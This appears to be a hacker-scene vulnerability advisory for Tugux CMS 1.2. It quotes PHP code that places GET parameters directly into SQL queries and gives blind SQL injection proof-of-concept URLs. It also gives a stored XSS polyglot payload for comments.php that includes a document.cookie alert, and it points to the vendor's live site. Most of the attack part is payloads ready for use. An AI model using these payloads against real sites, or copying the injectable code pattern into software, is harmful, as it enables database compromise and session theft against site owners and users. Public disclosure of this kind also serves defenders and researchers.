=================================================================== Tugux CMS 1.2 Multiple vulnerability (BLIND sql & xss) =================================================================== Software: Tugux CMS Vendor: www.tugux.com Vuln Type: BLind SQL Injection Download link: http://www.tugux.com/uploads/47/tugux_cms.rar Author: eidelweiss contact: admin[at]eidelweiss[dot]info Home: www.eidelweiss.info References: http://eidelweiss-advisories.blogspot.com/2011/07/tugux-cms-12-multiple- vulnerability.html =================================================================== Vuln c0de on page_text.php <?php session_start(); require_once "scripts/connect_to_mysql.php"; if (isset($_GET['pid'])){ $pageid=$_GET['pid']; //------------------------------------------------ $sqlCommand="SELECT lastmodified FROM pages WHERE id='$pageid' LIMIT 1"; $query=mysqli_query($myConnection, $sqlCommand) or die (mysqli_error()); while($row=mysqli_fetch_array($query)) { $date = $row["lastmodified"]; } mysqli_free_result($query); //------------------------------------------------ //------------------------------------------------ $sqlCommand = "SELECT admin FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1"; $query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error()); while($row = mysqli_fetch_array($query)){ $admin = $row["admin"]; } mysqli_free_result($query); //------------------------------------------------ //------------------------------------------------ $sqlCommand = "SELECT pagebody FROM pages WHERE showing='1' AND id='$pageid' LIMIT 1"; $query = mysqli_query($myConnection, $sqlCommand) or die (mysqli_error()); while($row = mysqli_fetch_array($query)){ $body = $row["pagebody"]; } mysqli_free_result($query); } //------------------------------------------------ if (isset($_GET['nid'])){ $nid=$_GET['nid']; $sql=mysqli_query($myConnection,"SELECT title, date, admin, news FROM news WHERE id='$nid'") or die (mysqli_error($myConnection)); =================================================================== exploit & p0c [!] page_text.php?nid=[valid nid] [!] page_text.php?pid=[valid pid] Example p0c [!] http://server/page_text.php?nid=12 <= True [!] http://server/page_text.php?nid=-12 <= False [!] http://server/page_text.php?pid=51 <= True [!] http://server/page_text.php?pid=-51 <= False [+] http://server:3306 <= download the file , save and open with c++ or wordpad will show mysql version [!] sample: http://server:3306 result : 5.0.92-community (use versi 5.0.92) :D =================================================================== Software: Tugux CMS Vendor: www.tugux.com Vuln Type: xss Download link: http://www.tugux.com/uploads/47/tugux_cms.rar Author: eidelweiss contact: admin[at]eidelweiss[dot]info Home: www.eidelweiss.info ==================================================================== comments.php file is persistant to xss attack Go to http://server/comments.php and put or type this xss c0de into the command box ';alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73 ,68,69,76,87,69,73,83,83))//\';alert(String.fromCharCode(88,83,83,32,65, 84,65,67,75,32,66,89,32,69,73,68,69,76,87,69,73,83,83))//";alert(String. fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,76,87,69 ,73,83,83))//\";alert(String.fromCharCode(88,83,83,32,65,84,65,67,75,32, 66,89,32,69,73,68,69,76,87,69,73,83,83))//--></SCRIPT>">'><SCRIPT>alert( String.fromCharCode(88,83,83,32,65,84,65,67,75,32,66,89,32,69,73,68,69,7 6,87,69,73,83,83))</SCRIPT><script>alert(document.cookie)</script> then the site will direct you to http://server/latest.php?nid= and there you go.. xss will pop up p0c: http://server/comments.php or http://server/path/comments.php official site: http://www.tugux.com/comments.php Gratz: - YOGYACARDERLINK , DEVILZC0DE , etc - Nofia Fitri (unyu²), whitehat, note, petimati, psycothic_girl, viska agasi (dudutzkuw), wenkhairu, etc (capek aja di ketik semua) ==================================================================== Nothing Impossible In This World Even Nobody`s Perfect Hacking is Art =================================================================== ==========================| -=[ E0F ]=- |==========================